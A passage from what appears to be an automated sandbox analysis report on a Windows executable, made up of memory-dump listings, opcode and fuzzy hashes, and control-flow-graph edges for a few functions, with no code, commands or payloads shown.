                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: 01b358f7909c69bdeb57d5dbfcf496cb7c122e02f8ba5860340fe6b650e593a2
                                                                                                                                                • Instruction ID: ef5bcddac28fbc2aae3b71bc90b7143346d73da4dc78a960624816ce731adefa
                                                                                                                                                • Opcode Fuzzy Hash: 01b358f7909c69bdeb57d5dbfcf496cb7c122e02f8ba5860340fe6b650e593a2
                                                                                                                                                • Instruction Fuzzy Hash: C1118C75918240EBC301AF28E844E1FBFF5EF96710F058828E485AB212E335E815CBA2
                                                                                                                                                Function 0057049B Relevance: .3, Instructions: 264COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 397 57049b-570515 call 56c9f0 401 570417-570430 397->401 402 570356 397->402 403 570393-570397 397->403 404 570472-570477 397->404 405 570311-570332 397->405 406 570370-57037e 397->406 407 5703d0-5703d7 397->407 408 57035f-570367 397->408 409 5703be 397->409 410 5703de-5703e3 397->410 411 57051c-57051e 397->411 412 57045b-570469 call 5a5700 397->412 413 5703fb-570414 397->413 414 570339-57034f 397->414 415 570227-57023b 397->415 416 570246-570260 397->416 417 570386-57038c 397->417 418 570242-570244 397->418 419 570482-570484 397->419 420 570440-570458 call 5a5700 397->420 421 570480 397->421 422 5703ec-5703f4 397->422 423 570308-57030c 397->423 401->420 402->408 431 5703a0-5703b7 403->431 404->421 405->401 405->402 405->403 405->404 405->406 405->407 405->408 405->409 405->410 405->412 405->413 405->414 405->417 405->419 405->420 405->421 405->422 406->417 407->401 407->403 407->404 407->410 407->413 407->417 407->419 407->421 407->422 408->406 409->407 410->422 424 570520-570b30 411->424 412->404 413->401 414->401 414->402 414->403 414->404 414->406 414->407 414->408 414->409 414->410 414->412 414->413 414->417 414->419 414->420 414->421 414->422 415->401 415->402 415->403 415->404 415->405 415->406 415->407 415->408 415->409 415->410 415->412 415->413 415->414 415->416 415->417 415->418 415->419 415->420 415->421 415->422 415->423 426 570294 416->426 427 570262 416->427 417->403 417->404 417->419 417->421 425 570296-5702bd 418->425 429 57048d-570496 419->429 420->412 422->403 422->404 422->413 422->419 422->421 423->429 433 5702bf 425->433 434 5702ea-570301 425->434 426->425 432 570270-570292 call 572eb0 427->432 429->424 431->401 431->403 431->404 431->407 431->409 431->410 431->412 431->413 431->417 431->419 431->420 431->421 431->422 432->426 444 5702c0-5702e8 call 572e70 433->444 434->401 434->402 434->403 434->404 434->405 434->406 434->407 434->408 434->409 434->410 434->412 434->413 434->414 434->417 434->419 434->420 434->421 434->422 434->423 444->434
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 93ece34935bfee07857162486d1cdd2903c9393e77de05105107fcb91b1aa9fb
                                                                                                                                                • Instruction ID: 4ff19bb85c7645e13abba9f82db3f3f15437cd4a7c933e981497e4b641116492
                                                                                                                                                • Opcode Fuzzy Hash: 93ece34935bfee07857162486d1cdd2903c9393e77de05105107fcb91b1aa9fb
                                                                                                                                                • Instruction Fuzzy Hash: 73917D75200B01CFD724CF65E894A27B7F6FF89314B158A6CE856876A2D730F819DB50
                                                                                                                                                Function 00570228 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 451 570228-57023b 452 570417-570430 451->452 453 570356 451->453 454 570393-570397 451->454 455 570472-570477 451->455 456 570311-570332 451->456 457 570370-57037e 451->457 458 5703d0-5703d7 451->458 459 57035f-570367 451->459 460 5703be 451->460 461 5703de-5703e3 451->461 462 57045b-570469 call 5a5700 451->462 463 5703fb-570414 451->463 464 570339-57034f 451->464 465 570246-570260 451->465 466 570386-57038c 451->466 467 570242-570244 451->467 468 570482-570484 451->468 469 570440-570458 call 5a5700 451->469 470 570480 451->470 471 5703ec-5703f4 451->471 472 570308-57030c 451->472 452->469 453->459 479 5703a0-5703b7 454->479 455->470 456->452 456->453 456->454 456->455 456->457 456->458 456->459 456->460 456->461 456->462 456->463 456->464 456->466 456->468 456->469 456->470 456->471 457->466 458->452 458->454 458->455 458->461 458->463 458->466 458->468 458->470 458->471 459->457 460->458 461->471 462->455 463->452 464->452 464->453 464->454 464->455 464->457 464->458 464->459 464->460 464->461 464->462 464->463 464->466 464->468 464->469 464->470 464->471 474 570294 465->474 475 570262 465->475 466->454 466->455 466->468 466->470 473 570296-5702bd 467->473 477 57048d-570b30 468->477 469->462 471->454 471->455 471->463 471->468 471->470 472->477 481 5702bf 473->481 482 5702ea-570301 473->482 474->473 480 570270-570292 call 572eb0 475->480 479->452 479->454 479->455 479->458 479->460 479->461 479->462 479->463 479->466 479->468 479->469 479->470 479->471 480->474 491 5702c0-5702e8 call 572e70 481->491 482->452 482->453 482->454 482->455 482->456 482->457 482->458 482->459 482->460 482->461 482->462 482->463 482->464 482->466 482->468 482->469 482->470 482->471 482->472 491->482
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 21a45e692e28900293efa1a37203f20e90fcc85fb5c6d8eb431a85b8100bb21f
                                                                                                                                                • Instruction ID: d50ac71403409a97d97f3fe13488208e8cfe78f74159fe5953085971b806cf3c
                                                                                                                                                • Opcode Fuzzy Hash: 21a45e692e28900293efa1a37203f20e90fcc85fb5c6d8eb431a85b8100bb21f
                                                                                                                                                • Instruction Fuzzy Hash: C4718C75200701DFD7248F60E898A26BBF6FF4A314F158968E886876A2D731A819DF60
                                                                                                                                                Function 0056D110 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 500 56d110-56d11b call 5a4cc0 503 56d121-56d130 call 59c8d0 500->503 504 56d2ee-56d2f6 500->504 509 56d136-56d15f 503->509 510 56d2e9 call 5a56e0 503->510 514 56d196-56d1bf 509->514 515 56d161 509->515 510->504 517 56d1f6-56d20c 514->517 518 56d1c1 514->518 516 56d170-56d194 call 56d300 515->516 516->514 521 56d20e-56d20f 517->521 522 56d239-56d23b 517->522 520 56d1d0-56d1f4 call 56d370 518->520 520->517 525 56d210-56d237 call 56d3e0 521->525 526 56d286-56d2aa 522->526 527 56d23d-56d25a 522->527 525->522 529 56d2d6-56d2dd call 56e8f0 526->529 530 56d2ac-56d2af 526->530 527->526 528 56d25c-56d25f 527->528 533 56d260-56d284 call 56d440 528->533 529->510 542 56d2df call 572f10 529->542 534 56d2b0-56d2d4 call 56d490 530->534 533->526 534->529 544 56d2e4 call 570b40 542->544 544->510
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6411b9fcdeac3fc0c94840406739d2d53f3b625f9a998405562bacb7fa91b7d9
                                                                                                                                                • Instruction ID: 6d29c2ccce49ac0cc031b451b914674cb6cf2e702bfacead6fc35c13f5b1a21a
                                                                                                                                                • Opcode Fuzzy Hash: 6411b9fcdeac3fc0c94840406739d2d53f3b625f9a998405562bacb7fa91b7d9
                                                                                                                                                • Instruction Fuzzy Hash: 25413274A09380ABC701AB69D599A2EFFF5AF92705F148C0CE9C49B212C736D814DB67
                                                                                                                                                Function 005A99D0 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
